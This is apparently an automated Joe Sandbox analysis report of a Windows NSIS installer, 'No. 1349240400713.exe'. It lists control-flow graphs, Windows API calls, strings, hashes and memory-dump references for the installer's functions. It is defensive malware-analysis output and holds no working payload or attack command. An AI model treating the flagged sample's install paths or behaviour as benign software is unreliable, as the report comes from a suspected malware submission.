                                                                control_flow_graph 368 403ae0-403af8 call 406806 371 403afa-403b0a call 406358 368->371 372 403b0c-403b43 call 4062df 368->372 381 403b66-403b8f call 403db6 call 405dee 371->381 377 403b45-403b56 call 4062df 372->377 378 403b5b-403b61 lstrcatW 372->378 377->378 378->381 386 403c21-403c29 call 405dee 381->386 387 403b95-403b9a 381->387 393 403c37-403c5c LoadImageW 386->393 394 403c2b-403c32 call 40644e 386->394 387->386 389 403ba0-403bc8 call 4062df 387->389 389->386 395 403bca-403bce 389->395 397 403cdd-403ce5 call 40140b 393->397 398 403c5e-403c8e RegisterClassW 393->398 394->393 399 403be0-403bec lstrlenW 395->399 400 403bd0-403bdd call 405d13 395->400 411 403ce7-403cea 397->411 412 403cef-403cfa call 403db6 397->412 401 403c94-403cd8 SystemParametersInfoW CreateWindowExW 398->401 402 403dac 398->402 406 403c14-403c1c call 405ce6 call 406411 399->406 407 403bee-403bfc lstrcmpiW 399->407 400->399 401->397 405 403dae-403db5 402->405 406->386 407->406 410 403bfe-403c08 GetFileAttributesW 407->410 414 403c0a-403c0c 410->414 415 403c0e-403c0f call 405d32 410->415 411->405 421 403d00-403d1a ShowWindow call 406796 412->421 422 403d83-403d8b call 40554c 412->422 414->406 414->415 415->406 427 403d26-403d38 GetClassInfoW 421->427 428 403d1c-403d21 call 406796 421->428 429 403da5-403da7 call 40140b 422->429 430 403d8d-403d93 422->430 433 403d50-403d73 DialogBoxParamW call 40140b 427->433 434 403d3a-403d4a GetClassInfoW RegisterClassW 427->434 428->427 429->402 430->411 435 403d99-403da0 call 40140b 430->435 439 403d78-403d81 call 403a30 433->439 434->433 435->411 439->405
                                                                APIs
                                                                  • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                  • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",00000000), ref: 00403B61
                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\udstrmningsdysernes\eir\Speckly,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,771B3420), ref: 00403BE1
                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\udstrmningsdysernes\eir\Speckly,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403BFF
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\udstrmningsdysernes\eir\Speckly), ref: 00403C48
                                                                  • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                • RegisterClassW.USER32(00433EA0), ref: 00403C85
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403D08
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D4A
                                                                • DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\udstrmningsdysernes\eir\Speckly$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                • API String ID: 1975747703-3362506133
                                                                • Opcode ID: d0a9a63d962560b66f9d03636585c912b1b432706de4baa1d25fdb2d125816db
                                                                • Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
                                                                • Opcode Fuzzy Hash: d0a9a63d962560b66f9d03636585c912b1b432706de4baa1d25fdb2d125816db
                                                                • Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D
                                                                Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 442 403015-403063 GetTickCount GetModuleFileNameW call 405f07 445 403065-40306a 442->445 446 40306f-40309d call 406411 call 405d32 call 406411 GetFileSize 442->446 447 403245-403249 445->447 454 4030a3 446->454 455 403188-403196 call 402fb1 446->455 456 4030a8-4030bf 454->456 462 403198-40319b 455->462 463 4031eb-4031f0 455->463 458 4030c1 456->458 459 4030c3-4030cc call 403467 456->459 458->459 468 4031f2-4031fa call 402fb1 459->468 469 4030d2-4030d9 459->469 464 40319d-4031b5 call 40347d call 403467 462->464 465 4031bf-4031e9 GlobalAlloc call 40347d call 40324c 462->465 463->447 464->463 488 4031b7-4031bd 464->488 465->463 493 4031fc-40320d 465->493 468->463 472 403155-403159 469->472 473 4030db-4030ef call 405ec2 469->473 477 403163-403169 472->477 478 40315b-403162 call 402fb1 472->478 473->477 491 4030f1-4030f8 473->491 484 403178-403180 477->484 485 40316b-403175 call 4068f3 477->485 478->477 484->456 492 403186 484->492 485->484 488->463 488->465 491->477 497 4030fa-403101 491->497 492->455 494 403215-40321a 493->494 495 40320f 493->495 498 40321b-403221 494->498 495->494 497->477 499 403103-40310a 497->499 498->498 500 403223-40323e SetFilePointer call 405ec2 498->500 499->477 501 40310c-403113 499->501 504 403243 500->504 501->477 503 403115-403135 501->503 503->463 505 40313b-40313f 503->505 504->447 506 403141-403145 505->506 507 403147-40314f 505->507 506->492 506->507 507->477 508 403151-403153 507->508 508->477
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\No. 1349240400713.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                  • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                  • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\No. 1349240400713.exe,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: "C:\Users\user\Desktop\No. 1349240400713.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\No. 1349240400713.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 2803837635-2209193041
                                                                • Opcode ID: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                • Instruction ID: 352fdba277142773567f3d30b5bba7b1c47688a28dd7517ec43723b707c69b17
                                                                • Opcode Fuzzy Hash: a52360a1b04fecb28cdb34ea46c0a5e0142df37db4d5eb2ecb020a06199e7e0c
                                                                • Instruction Fuzzy Hash: CF51D331904204ABDB109FA5DD85B9E7EACEB48356F24803BF910BA2D1C77C9F418B9D
                                                                Function 0040644E Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 794 40644e-406459 795 40645b-40646a 794->795 796 40646c-406482 794->796 795->796 797 406488-406495 796->797 798 40669a-4066a0 796->798 797->798 799 40649b-4064a2 797->799 800 4066a6-4066b1 798->800 801 4064a7-4064b4 798->801 799->798 803 4066b3-4066b7 call 406411 800->803 804 4066bc-4066bd 800->804 801->800 802 4064ba-4064c6 801->802 805 406687 802->805 806 4064cc-40650a 802->806 803->804 810 406695-406698 805->810 811 406689-406693 805->811 808 406510-40651b 806->808 809 40662a-40662e 806->809 812 406534 808->812 813 40651d-406522 808->813 814 406630-406636 809->814 815 406661-406665 809->815 810->798 811->798 821 40653b-406542 812->821 813->812 818 406524-406527 813->818 819 406646-406652 call 406411 814->819 820 406638-406644 call 406358 814->820 816 406674-406685 lstrlenW 815->816 817 406667-40666f call 40644e 815->817 816->798 817->816 818->812 824 406529-40652c 818->824 830 406657-40665d 819->830 820->830 826 406544-406546 821->826 827 406547-406549 821->827 824->812 831 40652e-406532 824->831 826->827 828 406584-406587 827->828 829 40654b-406569 call 4062df 827->829 835 406597-40659a 828->835 836 406589-406595 GetSystemDirectoryW 828->836 837 40656e-406572 829->837 830->816 834 40665f 830->834 831->821 838 406622-406628 call 4066c0 834->838 840 406605-406607 835->840 841 40659c-4065aa GetWindowsDirectoryW 835->841 839 406609-40660d 836->839 842 406612-406615 837->842 843 406578-40657f call 40644e 837->843 838->816 839->838 845 40660f 839->845 840->839 844 4065ac-4065b6 840->844 841->840 842->838 848 406617-40661d lstrcatW 842->848 843->839 850 4065d0-4065e6 SHGetSpecialFolderLocation 844->850 851 4065b8-4065bb 844->851 845->842 848->838 852 406601 850->852 853 4065e8-4065ff SHGetPathFromIDListW CoTaskMemFree 850->853 851->850 855 4065bd-4065c4 851->855 852->840 853->839 853->852 856 4065cc-4065ce 855->856 856->839 856->850
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040658F
                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 004065A2
                                                                • SHGetSpecialFolderLocation.SHELL32(004054B0,00425A20,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 004065DE
                                                                • SHGetPathFromIDListW.SHELL32(00425A20,Call), ref: 004065EC
                                                                • CoTaskMemFree.OLE32(00425A20), ref: 004065F7
                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040661D
                                                                • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004054B0,0042C248,00000000), ref: 00406675
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 717251189-1230650788
                                                                • Opcode ID: 2c2ecd46c083869abf5f0cc2869f7ea5c15be7567ee334f864889eeacbeedf20
                                                                • Instruction ID: cd0f296135d024e5542a1133132ccafb23cc3a0c8fe84acec88ebf75cbd5934e
                                                                • Opcode Fuzzy Hash: 2c2ecd46c083869abf5f0cc2869f7ea5c15be7567ee334f864889eeacbeedf20
                                                                • Instruction Fuzzy Hash: 9C614471A00111AADF208F54DD41BBE37A5AF44314F26853FE943B62D0EB3E5AA2CB5D
                                                                Function 0040324C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 857 40324c-403263 858 403265 857->858 859 40326c-403275 857->859 858->859 860 403277 859->860 861 40327e-403283 859->861 860->861 862 403293-4032a0 call 403467 861->862 863 403285-40328e call 40347d 861->863 867 403455 862->867 868 4032a6-4032aa 862->868 863->862 869 403457-403458 867->869 870 403400-403402 868->870 871 4032b0-4032f9 GetTickCount 868->871 874 403460-403464 869->874 872 403442-403445 870->872 873 403404-403407 870->873 875 40345d 871->875 876 4032ff-403307 871->876 877 403447 872->877 878 40344a-403453 call 403467 872->878 873->875 879 403409 873->879 875->874 880 403309 876->880 881 40330c-40331a call 403467 876->881 877->878 878->867 890 40345a 878->890 883 40340c-403412 879->883 880->881 881->867 889 403320-403329 881->889 887 403414 883->887 888 403416-403424 call 403467 883->888 887->888 888->867 894 403426-403432 call 405fb9 888->894 892 40332f-40334f call 406961 889->892 890->875 899 403355-403368 GetTickCount 892->899 900 4033f8-4033fa 892->900 901 403434-40343e 894->901 902 4033fc-4033fe 894->902 903 4033b3-4033b5 899->903 904 40336a-403372 899->904 900->869 901->883 905 403440 901->905 902->869 908 4033b7-4033bb 903->908 909 4033ec-4033f0 903->909 906 403374-403378 904->906 907 40337a-4033b0 MulDiv wsprintfW call 405479 904->907 905->875 906->903 906->907 907->903 912 4033d2-4033dd 908->912 913 4033bd-4033c4 call 405fb9 908->913 909->876 910 4033f6 909->910 910->875 914 4033e0-4033e4 912->914 918 4033c9-4033cb 913->918 914->892 917 4033ea 914->917 917->875 918->902 919 4033cd-4033d0 918->919 919->914
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CountTick$wsprintf
                                                                • String ID: *B$ ZB$ A$ A$... %d%%
                                                                • API String ID: 551687249-3856725213
                                                                • Opcode ID: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                • Instruction ID: 934ec796fb5923f126773143cacc3683187fa16e161fba292e3b1b9e9ada072f
                                                                • Opcode Fuzzy Hash: 6aa008098f4ef09d38d5c59ecde741492560208fda71d4d747c9693988f45b69
                                                                • Instruction Fuzzy Hash: 44518C71D00219DBCB11DF65EA84B9E7FA8AF01756F10817BEC10BB2C1C7789A40CBA9
                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 920 40176f-401794 call 402d3e call 405d5d 925 401796-40179c call 406411 920->925 926 40179e-4017b0 call 406411 call 405ce6 lstrcatW 920->926 931 4017b5-4017b6 call 4066c0 925->931 926->931 935 4017bb-4017bf 931->935 936 4017c1-4017cb call 40676f 935->936 937 4017f2-4017f5 935->937 944 4017dd-4017ef 936->944 945 4017cd-4017db CompareFileTime 936->945 939 4017f7-4017f8 call 405ee2 937->939 940 4017fd-401819 call 405f07 937->940 939->940 947 40181b-40181e 940->947 948 40188d-4018b6 call 405479 call 40324c 940->948 944->937 945->944 949 401820-40185e call 406411 * 2 call 40644e call 406411 call 405a77 947->949 950 40186f-401879 call 405479 947->950 960 4018b8-4018bc 948->960 961 4018be-4018ca SetFileTime 948->961 949->935 982 401864-401865 949->982 962 401882-401888 950->962 960->961 965 4018d0-4018db CloseHandle 960->965 961->965 966 402bcb 962->966 968 4018e1-4018e4 965->968 969 402bc2-402bc5 965->969 970 402bcd-402bd1 966->970 972 4018e6-4018f7 call 40644e lstrcatW 968->972 973 4018f9-4018fc call 40644e 968->973 969->966 979 401901-402390 972->979 973->979 983 402395-40239a 979->983 984 402390 call 405a77 979->984 982->962 985 401867-401868 982->985 983->970 984->983 985->950
                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\udstrmningsdysernes\eir\Speckly,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\udstrmningsdysernes\eir\Speckly,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,0042C248,00000000,00425A20,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                  • Part of subcall function 00405479: lstrcatW.KERNEL32(0042C248,004033B0,004033B0,0042C248,00000000,00425A20,771B23A0), ref: 004054D4
                                                                  • Part of subcall function 00405479: SetWindowTextW.USER32(0042C248,0042C248), ref: 004054E6
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp$C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp\System.dll$C:\Users\user\udstrmningsdysernes\eir\Speckly$Call
                                                                • API String ID: 1941528284-1797044270
                                                                • Opcode ID: 898ce4c5b6941fe7d419b72eda9361d5450072f2bf0dde35a2139be17a2a5618
                                                                • Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
                                                                • Opcode Fuzzy Hash: 898ce4c5b6941fe7d419b72eda9361d5450072f2bf0dde35a2139be17a2a5618
                                                                • Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D
                                                                Function 00405948 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 986 405948-405993 CreateDirectoryW 987 405995-405997 986->987 988 405999-4059a6 GetLastError 986->988 989 4059c0-4059c2 987->989 988->989 990 4059a8-4059bc SetFileSecurityW 988->990 990->987 991 4059be GetLastError 990->991 991->989
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040598B
                                                                • GetLastError.KERNEL32 ref: 0040599F
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
                                                                • GetLastError.KERNEL32 ref: 004059BE
                                                                Strings
                                                                • C:\Users\user\Desktop, xrefs: 00405948
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040596E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                • API String ID: 3449924974-2752704311
                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                • Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                • Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9
                                                                Function 00406796 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 992 406796-4067b6 GetSystemDirectoryW 993 4067b8 992->993 994 4067ba-4067bc 992->994 993->994 995 4067cd-4067cf 994->995 996 4067be-4067c7 994->996 998 4067d0-406803 wsprintfW LoadLibraryExW 995->998 996->995 997 4067c9-4067cb 996->997 997->998
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                • wsprintfW.USER32 ref: 004067E8
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
